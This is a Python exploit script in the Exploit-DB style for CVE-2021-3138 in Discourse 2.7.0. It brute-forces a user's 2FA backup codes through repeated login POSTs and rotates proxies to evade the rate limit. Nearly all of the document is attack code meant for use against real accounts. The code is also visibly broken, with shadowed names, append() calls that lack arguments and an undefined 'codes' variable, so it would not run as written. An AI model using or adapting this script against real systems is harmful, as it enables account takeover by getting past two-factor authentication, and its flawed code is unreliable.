# Exploit Title: Discourse 2.7.0 - Rate Limit Bypass leads to 2FA Bypass # Date: 14/01/2021 # Exploit Author: Mesh3l_911 # Vendor Homepage: https://www.discourse.org/ # Software Link:https://github.com/discourse/discourse # Version: Discourse 2.7.0 # CVE: CVE-2021-3138 import requests username = input("\n input ur username : ") password = input("\n input ur password : ") session=requests.session() proxies = [] def proxies(): proxies_path = input("\n input ur proxies path : ") with open(proxies_path, 'r') as prox: for _ in prox.read().splitlines(): proxies.append() backup_codes = [] def backup_list(): Backup_codes = input("\n input ur Backup_codes list path : ") with open(Backup_codes, 'r') as codes: for _ in codes.read().splitlines(): backup_codes.append() def exploit(): with open('Backup_codes.txt', 'w') as results: try: for __ in proxies: for _ in codes.read().splitlines(): header =\ { "X-CSRF-Token": "ur X-CSRF-Token", "Cookie": "ur Cookie", "X-Requested-With": "XMLHttpRequest" } body = {"login": username, "password": password, "second_factor_token": _, "second_factor_method": "2"} request = session.post("ur target_url", headers=header, data=body, proxies={'http': __, 'https':__}) source = request.text backup_codes.remove(_) if request.status_code == 200: if '"id"' in source: results.write("The Backup_Coude is > {} ".format(_)) return True else: pass else: proxies.remove(__) break except requests.exceptions.SSLError and requests.exceptions.ConnectionError: print(" Connection Failed :( ") results.close() def main(): if exploit(): print("\n Found :) \n") else: print("\n Please re-check ur inputs :( \n") if __name__ == '__main__': main()